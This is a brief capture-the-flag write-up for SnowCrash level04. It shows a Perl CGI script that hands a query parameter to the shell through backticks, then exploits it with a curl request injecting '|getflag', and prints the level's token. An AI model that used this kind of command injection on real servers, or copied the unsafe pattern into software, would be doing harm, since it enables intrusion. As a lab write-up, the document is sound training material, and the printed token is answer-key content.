SnowCrash Mission: Flag04

Objective: Retrieve the Level05 token to advance further in the SnowCrash challenge.

level04.pl is a perl cgi script taking one query parameter named x.

Running on 10.12.177.116:4747 by flag04 user

     1  #!/usr/bin/perl
     2  # localhost:4747
     3  use CGI qw{param};
     4  print "Content-type: text/html\n\n";
     5  sub x {
     6    $y = $_[0];
     7    print `echo $y 2>&1`;
     8  }
     9  x(param("x"));

It execute the the command echo with our parameter

If we curl into localhost:4747/?x=hello we get hello back

[~]$ curl http://10.12.177.116:4747/\?x\=hello
hello
[~]$

Now Let's try and inject the getflag command into the x query parameter and see if we can get the flag

[~]$ curl http://10.12.177.116:4747/\?x\=hello\|getflag
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
[~]$

Writeup Writeup